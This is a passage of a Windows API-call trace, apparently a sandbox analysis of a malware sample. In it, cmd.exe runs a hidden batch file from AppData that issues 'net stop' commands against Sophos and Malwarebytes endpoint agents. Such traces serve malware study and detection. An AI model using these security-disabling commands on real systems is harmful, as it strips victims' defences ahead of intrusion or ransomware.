hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos AgentΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x4b4, dwThreadId=0x58c)) returned 1 [0210.429] CloseHandle (hObject=0x74) returned 1 [0210.429] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0210.430] GetProcessHeap () returned 0x3e0000 [0210.430] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.430] GetEnvironmentStringsW () returned 0x3f8408* [0210.430] GetProcessHeap () returned 0x3e0000 [0210.430] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.430] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.430] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0210.572] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0210.572] CloseHandle (hObject=0x78) returned 1 [0210.572] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0210.572] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0210.572] GetProcessHeap () returned 0x3e0000 [0210.572] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.572] GetEnvironmentStringsW () returned 0x3f8408* [0210.572] GetProcessHeap () returned 0x3e0000 [0210.572] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.573] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.573] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.573] GetProcessHeap () returned 0x3e0000 [0210.573] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.573] GetEnvironmentStringsW () returned 0x3f8408* [0210.573] GetProcessHeap () returned 0x3e0000 [0210.573] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.573] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.573] GetProcessHeap () returned 0x3e0000 [0210.573] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0210.573] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0210.573] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.573] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0210.573] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.573] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0210.574] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.574] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0210.574] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.574] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0210.574] SetConsoleInputExeNameW () returned 0x1 [0210.574] GetConsoleOutputCP () returned 0x1b5 [0210.574] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0210.574] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.574] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0210.575] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0210.575] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.575] SetFilePointer (in: hFile=0x78, lDistanceToMove=4808, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12c8 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0210.575] GetProcessHeap () returned 0x3e0000 [0210.575] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0210.576] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.576] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12c8 [0210.576] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x5f9, lpOverlapped=0x0) returned 1 [0210.576] SetFilePointer (in: hFile=0x78, lDistanceToMove=4837, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12e5 [0210.576] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=29, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MBEndpointAgent /y\r\ny\r\nServiceΓÇ¥ /y\r\n¥ /y\r\nures\r\nnded\r\n") returned 29 [0210.576] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.576] GetFileType (hFile=0x78) returned 0x1 [0210.576] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.576] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12e5 [0210.576] GetProcessHeap () returned 0x3e0000 [0210.576] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0210.576] GetProcessHeap () returned 0x3e0000 [0210.576] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0210.579] _tell (_FileHandle=3) returned 4837 [0210.579] _close (_FileHandle=3) returned 0 [0210.580] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0210.580] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0210.580] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0210.580] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0210.580] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0210.580] _wcsicmp (_String1="net", _String2="CD") returned 11 [0210.580] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0210.580] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0210.580] _wcsicmp (_String1="net", _String2="REN") returned -4 [0210.580] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0210.580] _wcsicmp (_String1="net", _String2="SET") returned -5 [0210.580] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0210.580] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0210.580] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0210.580] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0210.580] _wcsicmp (_String1="net", _String2="MD") returned 1 [0210.580] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0210.580] _wcsicmp (_String1="net", _String2="RD") returned -4 [0210.580] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0210.580] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0210.580] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0210.580] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0210.580] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0210.580] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0210.580] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0210.580] _wcsicmp (_String1="net", _String2="VER") returned -8 [0210.580] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0210.580] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0210.580] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0210.580] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0210.580] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0210.580] _wcsicmp (_String1="net", _String2="START") returned -5 [0210.580] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0210.580] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0210.580] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0210.580] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0210.580] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0210.581] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0210.581] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0210.581] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0210.581] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0210.581] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0210.581] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0210.581] SetErrorMode (uMode=0x0) returned 0x1 [0210.581] GetProcessHeap () returned 0x3e0000 [0210.581] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0210.581] GetProcessHeap () returned 0x3e0000 [0210.581] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0210.582] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.582] GetProcessHeap () returned 0x3e0000 [0210.582] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0210.582] GetProcessHeap () returned 0x3e0000 [0210.582] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0210.582] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0210.582] GetProcessHeap () returned 0x3e0000 [0210.582] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0210.582] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.582] GetProcessHeap () returned 0x3e0000 [0210.582] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0210.582] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0210.582] GetProcessHeap () returned 0x3e0000 [0210.582] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0210.583] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.583] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.583] GetLastError () returned 0x2 [0210.584] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.584] GetLastError () returned 0x2 [0210.584] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.585] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.585] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.585] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.585] GetLastError () returned 0x2 [0210.586] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.586] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.586] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.586] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0210.587] SetErrorMode (uMode=0x0) returned 0x1 [0210.587] GetProcessHeap () returned 0x3e0000 [0210.587] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0210.587] GetProcessHeap () returned 0x3e0000 [0210.587] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0210.587] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.587] GetProcessHeap () returned 0x3e0000 [0210.587] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0210.587] GetProcessHeap () returned 0x3e0000 [0210.587] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0210.587] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0210.587] GetProcessHeap () returned 0x3e0000 [0210.588] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0210.588] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.588] GetProcessHeap () returned 0x3e0000 [0210.588] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0210.588] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0210.588] GetProcessHeap () returned 0x3e0000 [0210.588] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0210.588] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.589] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.589] GetLastError () returned 0x2 [0210.589] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.589] GetLastError () returned 0x2 [0210.590] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.590] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0210.590] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0210.591] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.591] GetLastError () returned 0x2 [0210.591] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0210.591] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0210.592] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.592] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0210.592] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0210.592] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0210.592] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0210.593] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MBEndpointAgent /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MBEndpointAgent /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MBEndpointAgent /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x444, dwThreadId=0x4fc)) returned 1 [0210.597] CloseHandle (hObject=0x78) returned 1 [0210.597] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0210.597] GetProcessHeap () returned 0x3e0000 [0210.597] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.597] GetEnvironmentStringsW () returned 0x3f8408* [0210.597] GetProcessHeap () returned 0x3e0000 [0210.597] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.597] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.597] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0210.734] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0210.734] CloseHandle (hObject=0x74) returned 1 [0210.734] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0210.734] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0210.734] GetProcessHeap () returned 0x3e0000 [0210.734] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.734] GetEnvironmentStringsW () returned 0x3f8408* [0210.734] GetProcessHeap () returned 0x3e0000 [0210.735] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.735] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.735] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.735] GetProcessHeap () returned 0x3e0000 [0210.735] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.735] GetEnvironmentStringsW () returned 0x3f8408* [0210.735] GetProcessHeap () returned 0x3e0000 [0210.735] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.736] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.736] GetProcessHeap () returned 0x3e0000 [0210.736] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0210.736] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0210.736] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.736] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0210.736] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.736] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0210.736] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.736] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0210.736] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.736] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0210.737] SetConsoleInputExeNameW () returned 0x1 [0210.737] GetConsoleOutputCP () returned 0x1b5 [0210.737] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0210.737] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0210.737] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0210.737] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.737] SetFilePointer (in: hFile=0x74, lDistanceToMove=4837, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12e5 [0210.737] GetProcessHeap () returned 0x3e0000 [0210.737] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0210.737] GetProcessHeap () returned 0x3e0000 [0210.737] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0210.737] GetProcessHeap () returned 0x3e0000 [0210.737] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0210.737] GetProcessHeap () returned 0x3e0000 [0210.737] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0210.738] GetProcessHeap () returned 0x3e0000 [0210.738] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0210.738] GetProcessHeap () returned 0x3e0000 [0210.738] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0210.738] GetProcessHeap () returned 0x3e0000 [0210.738] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0210.738] GetProcessHeap () returned 0x3e0000 [0210.738] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0210.738] GetProcessHeap () returned 0x3e0000 [0210.738] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0210.738] GetProcessHeap () returned 0x3e0000 [0210.738] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0210.738] GetProcessHeap () returned 0x3e0000 [0210.738] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0210.738] GetProcessHeap () returned 0x3e0000 [0210.738] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0210.738] GetProcessHeap () returned 0x3e0000 [0210.738] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0210.738] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.738] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12e5 [0210.738] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x5dc, lpOverlapped=0x0) returned 1 [0210.738] SetFilePointer (in: hFile=0x74, lDistanceToMove=4862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 